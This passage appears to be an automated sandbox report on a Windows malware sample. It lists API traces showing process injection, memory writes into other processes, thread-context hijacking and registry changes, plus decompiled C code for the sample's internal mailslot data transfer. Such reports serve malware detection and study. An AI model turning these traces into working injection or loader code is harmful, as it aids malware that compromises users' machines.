    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:C007415B17DF758F2ED04850F95EE60E
Total matches:155
Initial sample Analysis ID:64002
Initial sample SHA 256:212D2CE18964D507A6FE50EE7C33E5EC4FC6B44DEDCC9463D5F6E2581E48E4C3
Initial sample name:crypt_0001_1096a.exe

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax; // heap handle; E00401033 grows its receive buffer from it with HeapReAlloc
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed -- bytes 70 6E 6C 73, i.e. "pnls" in little-endian
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed -- mailslot reader thread; its body is listed below as E00401033
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed -- mailslot writer thread, listed below as E004010FB
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed -- both threads returned 0; per its API entry below the subcall does VirtualAlloc(MEM_COMMIT, PAGE_READWRITE)
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed -- GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2); // ERROR_FILE_NOT_FOUND: retry every 100 ms until the reader thread has created the slot
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb; // ERROR_BAD_FORMAT
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) { // anything but ERROR_SEM_TIMEOUT aborts the transfer; a timeout retries the same chunk
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) { // last chunk filled a whole message: resend its final byte as a 1-byte message so the reader's loop ends
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8); // zero the bytes that were sent before the buffer is freed
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 50136b8a9ad019f77738c7d2695a80d9cfa58a10d54e3dd229c6b48dc4baf302
  • Instruction ID: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
  • Opcode Fuzzy Hash: 2ED0A7C10F5D4412085E48CC143A5A300CAEC2171527BAE2F3439681A14B52311D0EC9
  • Instruction Fuzzy Hash: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 01B314D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,01B38000,?,?,01B3180F,00000000,?,01B37494), ref: 01B314FF
  • FindWindowA.USER32(01B38640,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31520
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
